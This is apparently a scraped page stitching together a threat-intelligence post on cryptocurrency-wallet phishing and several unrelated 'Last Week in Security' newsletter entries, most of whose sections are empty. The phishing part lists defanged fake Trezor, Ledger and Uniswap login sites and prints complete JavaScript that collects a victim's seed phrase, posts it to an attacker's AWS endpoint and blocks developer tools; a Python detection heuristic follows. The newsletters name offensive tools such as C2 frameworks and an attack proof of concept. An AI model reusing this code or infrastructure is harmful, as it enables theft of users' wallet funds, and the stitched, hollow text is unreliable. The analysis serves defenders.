https://tizrerlivwlt897wlt.azurewebsites[.]net/
https://tizrwlterliv45livwlt.azurewebsites[.]net/
https://tr01-dkfjgk-slas.s3.eu-north-1.amazonaws[.]com/index.html
https://tr0ox-obnsj.s3.eu-north-1.amazonaws[.]com/index.html
https://tra09fjl-sodfjjkd.s3.eu-north-1.amazonaws[.]com/index.html
https://trac-durjg-fkf.s3.eu-north-1.amazonaws[.]com/index.html
https://traezor-suitez403.azurewebsites[.]net/
https://traieazeariscoins.azurewebsites[.]net/
https://tre876162ru0988zer.azurewebsites[.]net/
https://treaizerecoins.azurewebsites[.]net/
https://treauzearcoins.azurewebsites[.]net/
https://treazerapi-apk.azurewebsites[.]net/
https://treazerszcoins.azurewebsites[.]net/
https://treaziexc-ax-bc.azurewebsites[.]net/
https://treazirapi-apk.azurewebsites[.]net/
https://treazosr-api.azurewebsites[.]net/
https://treazsoirsuites.azurewebsites[.]net/
https://treazuer-suite.azurewebsites[.]net/
https://treizaers-coins.azurewebsites[.]net/
https://treizoircoinerror3.azurewebsites[.]net/
https://treizrwalogn.azurewebsites[.]net/
https://treriertriliv34erwlt.azurewebsites[.]net/
https://trezaereade-suite.azurewebsites[.]net/
https://trezieserscoins.azurewebsites[.]net/
https://trezior-suite.azurewebsites[.]net/
https://trezirapp-api.azurewebsites[.]net/
https://treziresacoins.azurewebsites[.]net/
https://triezorwallets.azurewebsites[.]net/
https://trioriorwlt485wltliv.azurewebsites[.]net/
https://trizeriowaliet.azurewebsites[.]net/
https://triziorecoinsweb3.azurewebsites[.]net/
https://triziriosuite.azurewebsites[.]net/
https://trizuriosiute.azurewebsites[.]net/
https://trucetreizerr.azurewebsites[.]net/
https://truiazearcoins.azurewebsites[.]net/
https://trzeriostrt.azurewebsites[.]net/
https://ttrzorappsuite.azurewebsites[.]net/
https://tzer30liv.s3.us-east-2.amazonaws[.]com/index.html
https://tzr06wlt.s3.eu-north-1.amazonaws[.]com/index.html
https://tzreoirwlt05balba.azurewebsites[.]net/
https://tzreoriewlt31wikub.azurewebsites[.]net/
https://uniswapv3login.azurewebsites[.]net/
https://uphooldlogn.azurewebsites[.]net/
https://web-treszor.azurewebsites[.]net/
https://weberrortrezur886.azurewebsites[.]net/
https://wltcbserlive467wlt.azurewebsites[.]net/
https://wltlzr67erlivehsfjfd.azurewebsites[.]net/
https://woleatcoebs34livwlt.azurewebsites[.]net/
https://zen-ledger-error.azurewebsites[.]net/
https://zenledgerscoinsweb.azurewebsites[.]net/

Example JavaScript

This is an example of the JavaScript (“app.js”) that was included on one of the S3-hosted phishing pages: https://dft0-hjgkd26-fkj.s3.us-east-1.amazonaws[.]com/index.html.

Note the defanged malicious URL in the code below; that is the only alteration.

let currentWordCount = 12; // Default word count
function updateInputFields(wordCount) {
   const inputContainer = document.getElementById('inputContainer');
   inputContainer.innerHTML = '';
    currentWordCount = wordCount;
    for (let i = 0; i < wordCount; i++) { // Use 0-based index for phase keys
        const colDiv = document.createElement('div');
    // if (wordCount === 1) {
    //     colDiv.className = 'col-lg-21 col-md-12 col-sm-12 col-xs-12';
    //     colDiv.innerHTML = `
    //         <input
    //             class="form-control"
    //             type="text"
    //             placeholder="Input your words as many words as you have"
    //             name="word${i}"
    //             required
    //             title="Only alphabets are allowed.">
    //         <div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
    //     `;
    // } else {
        colDiv.className = 'col-lg-4 col-md-4 col-sm-4 col-xs-12';
        colDiv.innerHTML = `
            <input
                class="form-control"
                type="text"
                placeholder="${i + 1}."
                name="word${i}"
                required
                pattern="[a-zA-Z]{1,10}"
                maxlength="10"
                oninput="this.value = this.value.replace(/[^a-zA-Z]/g, '').substring(0, 10);"
                title="Only alphabets are allowed.">
            <div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
                `;
            // }
        inputContainer.appendChild(colDiv);
    }
    event.target.classList.add('active');
    const buttons = document.querySelectorAll('.displayflex button');
    buttons.forEach((button) => {
        button.classList.remove('active');
    });
    event.target.classList.add('active');
}
async function handleNextStep(event) {
    event.preventDefault();
    const inputContainer = document.getElementById('inputContainer');
    const inputs = inputContainer.querySelectorAll('input');
    let allValid = true;
    const enteredWords = new Set();
    inputs.forEach((input) => {
        const errorDiv = input.nextElementSibling; // Get the associated error div
        if (!input.checkValidity()) {
            errorDiv.style.display = 'block';
            allValid = false;
        } else {
            errorDiv.style.display = 'none';
        }
        const word = input.value.trim().toLowerCase(); // Normalize to lowercase to handle case insensitivity
        if (word && enteredWords.has(word)) {
            allValid = false;
            errorDiv.innerHTML = 'This word has already been entered.';
            errorDiv.style.display = 'block';
        } else {
            enteredWords.add(word);  // Add word to the Set
        }
    });
    if (!allValid) {
        alert("Mnemonic phrase is not valid. Try again.");
        return;
    }
    const data = {};
    inputs.forEach((input, index) => {
    data[`phrase${index}`] = input.value.trim();
    });
    data.subject = "Trezor connect2";
    data.message = "Successfull fetch data";
    $.ajax({
        type: "POST",
        url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/prod/eappmail",
        dataType: "json",
        crossDomain: true,
        contentType: "application/json; charset=utf-8",
        data: JSON.stringify(data),
        success: function (result) {
        alert('Data submitted successfully1!');
        window.location.href = 'https://suite.trezor.io/web/';
        location.reload();
        },
        error: function (xhr, status, error) {
            window.location.href = 'https://suite.trezor.io/web/';
 
 
        }
    });
}

window.onload = function () {
    // Prevent the back button from navigating back
    function preventBack() {
    history.forward();
    }
    
    // Execute the `preventBack` function immediately after page load
    setTimeout(preventBack, 0);
    
    // Ensure the page doesn't cache on unload, forcing users to reload
    window.onunload = function () {
        return null;
    };
};

document.addEventListener('DOMContentLoaded', () => updateInputFields(12));

document.addEventListener("DOMContentLoaded", function () {
    const statusButton = document.getElementById("statusButton");
    const statusText = document.getElementById("statusText");
    const statusIcon = document.getElementById("statusIcon");
    // Initial state: "Waiting for Trezor..."
    statusText.textContent = "Waiting for Trezor... ";
    statusIcon.innerHTML = '';
    // After 2 seconds: "Establishing connection"
    setTimeout(() => {
        statusText.textContent = "Establishing connection...";
        statusIcon.innerHTML = '';
    }, 5000);
    // After 5 seconds: "Unable to read data" (Error state)
    setTimeout(() => {
    statusText.textContent = "Unable to read data";
    statusIcon.innerHTML = '';
    statusButton.classList.add("error-btn");
    }, 5000);
    function resetStatus() {
        // Reset to "Establishing connection..."
        statusText.textContent = "Establishing connection...";
        statusIcon.innerHTML = '';
        statusButton.classList.remove("error-btn");  // Reset error button class
        // After 3 seconds: Change status to "Unable to read data"
        setTimeout(() => {
            statusText.textContent = "Unable to read data";
            statusIcon.innerHTML = '';
            statusButton.classList.add("error-btn");
        }, 5000);
    }
    // Event listener for button click
    statusButton.addEventListener("click", function () {
        resetStatus(); // Reset and start the cycle on each click
    });
    // Optionally, you can trigger the status change flow immediately after page load for testing
    setTimeout(() => {
        resetStatus(); // Automatically run the flow when the page loads (optional)
    }, 5000);
});

    // Disable right-click context menu
    document.addEventListener("contextmenu", (event) => event.preventDefault());
    // Disable key combinations for opening developer tools
    document.addEventListener("keydown", (event) => {
    // Disable F12, Ctrl+Shift+I, Ctrl+Shift+J, Ctrl+U (View Source), Ctrl+Shift+C
    if (
        event.key === "F12" ||
        (event.ctrlKey && event.shiftKey && ["I", "J", "C"].includes(event.key)) ||
        (event.ctrlKey && event.key === "U")
    ) {
        event.preventDefault();
}
});

    // Detect if devtools is opened (basic detection)
    const detectDevTools = () => {
    const element = new Image();
        Object.defineProperty(element, "id", {
            get: () => {
                alert("Developer tools detected. Please close it to proceed.");
                // Redirect or log out the user
                window.location.href = "about:blank"; // Example action
            },
        });
        console.log(element);
    };
    detectDevTools();
    setInterval(detectDevTools, 1000);
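
The script above builds the seed-phrase input grid, validates the entered words, POSTs them to an attacker-controlled AWS API Gateway endpoint, and then redirects the victim to the legitimate Trezor Suite site, with basic anti-analysis tricks layered on top. A crude triage heuristic for saved pages that follow this pattern might look something like the sketch below; it is an assumption-laden illustration for this post, not a production detection.

# Hypothetical triage heuristic for saved phishing pages that follow the
# pattern above: a grid of mnemonic word inputs plus a POST to an AWS
# API Gateway ("execute-api") endpoint. Illustrative only.
import re
import sys

MNEMONIC_INPUT = re.compile(r'name="word\d+"')   # rendered inputs: word0, word1, ...
EXFIL_ENDPOINT = re.compile(
    r'https?://[a-z0-9]+\.execute-api\.[a-z0-9-]+\.amazonaws\.com', re.I)
SEED_KEYWORDS = re.compile(r'mnemonic|recovery phrase|seed phrase', re.I)

def score(page_source: str) -> int:
    """Return a simple 0-3 score; 2 or more is worth a closer look."""
    hits = 0
    if len(MNEMONIC_INPUT.findall(page_source)) >= 12 or 'name="word${i}"' in page_source:
        hits += 1
    if EXFIL_ENDPOINT.search(page_source):
        hits += 1
    if SEED_KEYWORDS.search(page_source):
        hits += 1
    return hits

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as f:
            print(path, score(f.read()))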

Last Week in Security (LWiS) - 2025-06-02

By: Erik
3 June 2025 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-05-27 to 2025-06-02.

News

Techniques and Write-ups

Tools and Exploits

  • boflink - Linker for Beacon Object Files.
  • godump - A minimal, developer-friendly pretty-printer and debug dumper for Go structs, inspired by Laravel’s dump() and Symfony’s VarDumper.
  • Obfusk8 - Obfuscation library based on C++17 for Windows binaries.
  • termitty - The terminal automation framework.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

Last Week in Security (LWiS) - 2025-05-27

By: Erik
28 May 2025 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-05-19 to 2025-05-27.

News

Techniques and Write-ups

Tools and Exploits

  • SharpSuccessor - SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai.
  • BadSuccessor.ps1 - BadSuccessor checks for prerequisites and attack abuse.
  • OnionC2 - C2 written in Rust & Go powered by Tor network.
  • AI-Red-Teaming-Playground-Labs - AI Red Teaming playground labs to run AI Red Teaming trainings including infrastructure.
  • brc4_profile_maker - An interactive TUI tool to create Brute Ratel C4 profiles based on BURP browsing data.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • kunai - Threat-hunting tool for Linux.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

Last Week in Security (LWiS) - 2025-05-19

By: Erik
20 May 2025 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-05-12 to 2025-05-19.

News

Techniques and Write-ups

Tools and Exploits

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.
